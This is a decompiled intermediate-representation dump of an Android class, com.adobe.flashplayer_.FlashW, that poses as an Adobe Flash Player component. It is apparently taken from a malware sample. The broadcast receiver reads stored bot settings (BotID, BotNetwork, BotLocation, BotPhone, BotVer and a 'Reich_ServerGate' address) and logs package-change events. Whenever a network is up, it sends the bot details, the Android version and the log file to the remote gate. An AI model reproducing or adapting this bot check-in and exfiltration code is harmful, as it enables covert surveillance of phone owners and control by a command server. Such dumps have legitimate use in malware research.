record `com.adobe.flashplayer_.FlashW` @kind class @AccessFlag PUBLIC extends `android.content.BroadcastReceiver` @kind class {
}
procedure `void` `<init>`(`com.adobe.flashplayer_.FlashW` v0 @kind this) @signature `Lcom/adobe/flashplayer_/FlashW;.<init>:()V` @AccessFlag PUBLIC_CONSTRUCTOR {
    temp;

  #L036034.  call `<init>`(v0) @signature `Landroid/content/BroadcastReceiver;.<init>:()V` @kind direct;
  #L03603a.  return @kind void;
}
procedure `java.lang.String` `readConfig`(`com.adobe.flashplayer_.FlashW` v7 @kind this, `java.lang.String` v8 @kind object @name `config`, `android.content.Context` v9 @kind object @name `context`) @signature `Lcom/adobe/flashplayer_/FlashW;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;

  #L03604c.  v4:= "" @kind object;
  #L036050.  call temp:= `openFileInput`(v9, v8) @signature `Landroid/content/Context;.openFileInput:(Ljava/lang/String;)Ljava/io/FileInputStream;` @kind virtual;
  #L036056.  v1:= temp @kind object;
  #L036058.  if v1 == 0 then goto L036098;
  #L03605c.  v2:= new `java.io.InputStreamReader`;
  #L036060.  call `<init>`(v2, v1) @signature `Ljava/io/InputStreamReader;.<init>:(Ljava/io/InputStream;)V` @kind direct;
  #L036066.  v0:= new `java.io.BufferedReader`;
  #L03606a.  call `<init>`(v0, v2) @signature `Ljava/io/BufferedReader;.<init>:(Ljava/io/Reader;)V` @kind direct;
  #L036070.  v3:= "" @kind object;
  #L036074.  v5:= new `java.lang.StringBuilder`;
  #L036078.  call `<init>`(v5) @signature `Ljava/lang/StringBuilder;.<init>:()V` @kind direct;
  #L03607e.  call temp:= `readLine`(v0) @signature `Ljava/io/BufferedReader;.readLine:()Ljava/lang/String;` @kind virtual;
  #L036084.  v3:= temp @kind object;
  #L036086.  if v3 != 0 then goto L03609a;
  #L03608a.  call `close`(v1) @signature `Ljava/io/InputStream;.close:()V` @kind virtual;
  #L036090.  call temp:= `toString`(v5) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L036096.  v4:= temp @kind object;
  #L036098.  return v4 @kind object;
  #L03609a.  call temp:= `append`(v5, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0360a0.  goto L03607e;
  #L0360a2.  v6:= Exception @type ^`java.io.FileNotFoundException` @kind object;
  #L0360a4.  goto L036098;
  #L0360a6.  v6:= Exception @type ^`java.io.IOException` @kind object;
  #L0360a8.  goto L036098;
  catch `java.io.FileNotFoundException` @[L036050..L0360a0] goto L0360a2;
  catch `java.io.IOException` @[L036050..L0360a0] goto L0360a6;
}
procedure `void` `writeConfig`(`com.adobe.flashplayer_.FlashW` v2 @kind this, `java.lang.String` v3 @kind object @name `config`, `java.lang.String` v4 @kind object @name `data`, `android.content.Context` v5 @kind object @name `context`) @signature `Lcom/adobe/flashplayer_/FlashW;.writeConfig:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;

  #L0360cc.  v0:= new `java.io.OutputStreamWriter`;
  #L0360d0.  v1:= 0I;
  #L0360d2.  call temp:= `openFileOutput`(v5, v3, v1) @signature `Landroid/content/Context;.openFileOutput:(Ljava/lang/String;I)Ljava/io/FileOutputStream;` @kind virtual;
  #L0360d8.  v1:= temp @kind object;
  #L0360da.  call `<init>`(v0, v1) @signature `Ljava/io/OutputStreamWriter;.<init>:(Ljava/io/OutputStream;)V` @kind direct;
  #L0360e0.  call `write`(v0, v4) @signature `Ljava/io/OutputStreamWriter;.write:(Ljava/lang/String;)V` @kind virtual;
  #L0360e6.  call `close`(v0) @signature `Ljava/io/OutputStreamWriter;.close:()V` @kind virtual;
  #L0360ec.  return @kind void;
  #L0360ee.  v1:= Exception @type ^`java.io.IOException` @kind object;
  #L0360f0.  goto L0360ec;
  catch `java.io.IOException` @[L0360cc..L0360ec] goto L0360ee;
}
procedure `void` `onReceive`(`com.adobe.flashplayer_.FlashW` v20 @kind this, `android.content.Context` v21 @kind object @name `context`, `android.content.Intent` v22 @kind object @name `intent`) @signature `Lcom/adobe/flashplayer_/FlashW;.onReceive:(Landroid/content/Context;Landroid/content/Intent;)V` @AccessFlag PUBLIC {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;
    v7;
    v8;
    v9;
    v10;
    v11;
    v12;
    v13;
    v14;
    v15;
    v16;
    v17;
    v18;
    v19;

  #L036114.  call temp:= `getData`(v22) @signature `Landroid/content/Intent;.getData:()Landroid/net/Uri;` @kind virtual;
  #L03611a.  v10:= temp @kind object;
  #L03611c.  call temp:= `getEncodedSchemeSpecificPart`(v10) @signature `Landroid/net/Uri;.getEncodedSchemeSpecificPart:()Ljava/lang/String;` @kind virtual;
  #L036122.  v12:= temp @kind object;
  #L036124.  v14:= "connectivity" @kind object;
  #L036128.  v0:= v21 @kind object;
  #L03612c.  call temp:= `getSystemService`(v0, v14) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L036132.  v9:= temp @kind object;
  #L036134.  v9:= (`android.net.ConnectivityManager`) v9 @kind object;
  #L036138.  call temp:= `getActiveNetworkInfo`(v9) @signature `Landroid/net/ConnectivityManager;.getActiveNetworkInfo:()Landroid/net/NetworkInfo;` @kind virtual;
  #L03613e.  v11:= temp @kind object;
  #L036140.  v14:= "BotID" @kind object;
  #L036144.  v0:= v20 @kind object;
  #L036148.  v1:= v21 @kind object;
  #L03614c.  call temp:= `readConfig`(v0, v14, v1) @signature `Lcom/adobe/flashplayer_/FlashW;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L036152.  v3:= temp @kind object;
  #L036154.  v14:= "BotNetwork" @kind object;
  #L036158.  v0:= v20 @kind object;
  #L03615c.  v1:= v21 @kind object;
  #L036160.  call temp:= `readConfig`(v0, v14, v1) @signature `Lcom/adobe/flashplayer_/FlashW;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L036166.  v5:= temp @kind object;
  #L036168.  v14:= "BotLocation" @kind object;
  #L03616c.  v0:= v20 @kind object;
  #L036170.  v1:= v21 @kind object;
  #L036174.  call temp:= `readConfig`(v0, v14, v1) @signature `Lcom/adobe/flashplayer_/FlashW;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L03617a.  v4:= temp @kind object;
  #L03617c.  v14:= "Reich_ServerGate" @kind object;
  #L036180.  v0:= v20 @kind object;
  #L036184.  v1:= v21 @kind object;
  #L036188.  call temp:= `readConfig`(v0, v14, v1) @signature `Lcom/adobe/flashplayer_/FlashW;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L03618e.  v8:= temp @kind object;
  #L036190.  v14:= "BotVer" @kind object;
  #L036194.  v0:= v20 @kind object;
  #L036198.  v1:= v21 @kind object;
  #L03619c.  call temp:= `readConfig`(v0, v14, v1) @signature `Lcom/adobe/flashplayer_/FlashW;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0361a2.  v6:= temp @kind object;
  #L0361a4.  v7:= `@@android.os.Build$VERSION.RELEASE` @type ^`java.lang.String` @kind object;
  #L0361a8.  v13:= "" @kind object;
  #L0361ac.  v14:= new `java.lang.StringBuilder`;
  #L0361b0.  call temp:= `valueOf`(v13) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L0361b6.  v15:= temp @kind object;
  #L0361b8.  call `<init>`(v14, v15) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L0361be.  v15:= "Action: " @kind object;
  #L0361c2.  call temp:= `append`(v14, v15) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0361c8.  v14:= temp @kind object;
  #L0361ca.  call temp:= `getAction`(v22) @signature `Landroid/content/Intent;.getAction:()Ljava/lang/String;` @kind virtual;
  #L0361d0.  v15:= temp @kind object;
  #L0361d2.  call temp:= `append`(v14, v15) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0361d8.  v14:= temp @kind object;
  #L0361da.  v15:= "\n" @kind object;
  #L0361de.  call temp:= `append`(v14, v15) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0361e4.  v14:= temp @kind object;
  #L0361e6.  call temp:= `toString`(v14) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0361ec.  v13:= temp @kind object;
  #L0361ee.  v14:= new `java.lang.StringBuilder`;
  #L0361f2.  call temp:= `valueOf`(v13) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L0361f8.  v15:= temp @kind object;
  #L0361fa.  call `<init>`(v14, v15) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036200.  v15:= "Package: " @kind object;
  #L036204.  call temp:= `append`(v14, v15) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03620a.  v14:= temp @kind object;
  #L03620c.  call temp:= `append`(v14, v12) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036212.  v14:= temp @kind object;
  #L036214.  call temp:= `toString`(v14) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L03621a.  v13:= temp @kind object;
  #L03621c.  v14:= "package" @kind object;
  #L036220.  v0:= v20 @kind object;
  #L036224.  v1:= v21 @kind object;
  #L036228.  call `writeConfig`(v0, v14, v13, v1) @signature `Lcom/adobe/flashplayer_/FlashW;.writeConfig:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @kind direct;
  #L03622e.  if v11 == 0 then goto L036356;
  #L036232.  call temp:= `isConnectedOrConnecting`(v11) @signature `Landroid/net/NetworkInfo;.isConnectedOrConnecting:()Z` @kind virtual;
  #L036238.  v14:= temp;
  #L03623a.  if v14 == 0 then goto L036356;
  #L03623e.  v14:= new `com.adobe.flashplayer_.FlashVirtual`;
  #L036242.  call `<init>`(v14) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.<init>:()V` @kind direct;
  #L036248.  v15:= 3I;
  #L03624a.  v15:= new `java.lang.String`[v15];
  #L03624e.  v16:= 0I;
  #L036252.  v17:= new `java.lang.StringBuilder`;
  #L036256.  v18:= "&b=" @kind object;
  #L03625a.  call `<init>`(v17, v18) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036260.  v0:= v17 @kind object;
  #L036264.  call temp:= `append`(v0, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03626a.  v17:= temp @kind object;
  #L03626c.  v18:= "&c=" @kind object;
  #L036270.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036276.  v17:= temp @kind object;
  #L036278.  v18:= ":" @kind object;
  #L03627c.  v19:= "" @kind object;
  #L036280.  v0:= v18 @kind object;
  #L036284.  v1:= v19 @kind object;
  #L036288.  call temp:= `replace`(v5, v0, v1) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L03628e.  v18:= temp @kind object;
  #L036290.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036296.  v17:= temp @kind object;
  #L036298.  v18:= "&d=" @kind object;
  #L03629c.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0362a2.  v17:= temp @kind object;
  #L0362a4.  v0:= v17 @kind object;
  #L0362a8.  call temp:= `append`(v0, v4) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0362ae.  v17:= temp @kind object;
  #L0362b0.  v18:= "&e=" @kind object;
  #L0362b4.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0362ba.  v17:= temp @kind object;
  #L0362bc.  v18:= "BotPhone" @kind object;
  #L0362c0.  v0:= v20 @kind object;
  #L0362c4.  v1:= v18 @kind object;
  #L0362c8.  v2:= v21 @kind object;
  #L0362cc.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashW;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0362d2.  v18:= temp @kind object;
  #L0362d4.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0362da.  v17:= temp @kind object;
  #L0362dc.  v18:= "&f=" @kind object;
  #L0362e0.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0362e6.  v17:= temp @kind object;
  #L0362e8.  v0:= v17 @kind object;
  #L0362ec.  call temp:= `append`(v0, v6) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0362f2.  v17:= temp @kind object;
  #L0362f4.  v18:= "&g=" @kind object;
  #L0362f8.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0362fe.  v17:= temp @kind object;
  #L036300.  v0:= v17 @kind object;
  #L036304.  call temp:= `append`(v0, v7) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03630a.  v17:= temp @kind object;
  #L03630c.  v18:= "&h=package&i=system" @kind object;
  #L036310.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036316.  v17:= temp @kind object;
  #L036318.  call temp:= `toString`(v17) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L03631e.  v17:= temp @kind object;
  #L036320.  v15[v16]:= v17 @kind object;
  #L036324.  v16:= 1I;
  #L036328.  v17:= "package" @kind object;
  #L03632c.  v0:= v21 @kind object;
  #L036330.  v1:= v17 @kind object;
  #L036334.  call temp:= `getFileStreamPath`(v0, v1) @signature `Landroid/content/Context;.getFileStreamPath:(Ljava/lang/String;)Ljava/io/File;` @kind virtual;
  #L03633a.  v17:= temp @kind object;
  #L03633c.  call temp:= `toString`(v17) @signature `Ljava/io/File;.toString:()Ljava/lang/String;` @kind virtual;
  #L036342.  v17:= temp @kind object;
  #L036344.  v15[v16]:= v17 @kind object;
  #L036348.  v16:= 2I;
  #L03634c.  v15[v16]:= v8 @kind object;
  #L036350.  call temp:= `execute`(v14, v15) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.execute:([Ljava/lang/Object;)Landroid/os/AsyncTask;` @kind virtual;
  #L036356.  return @kind void;
}
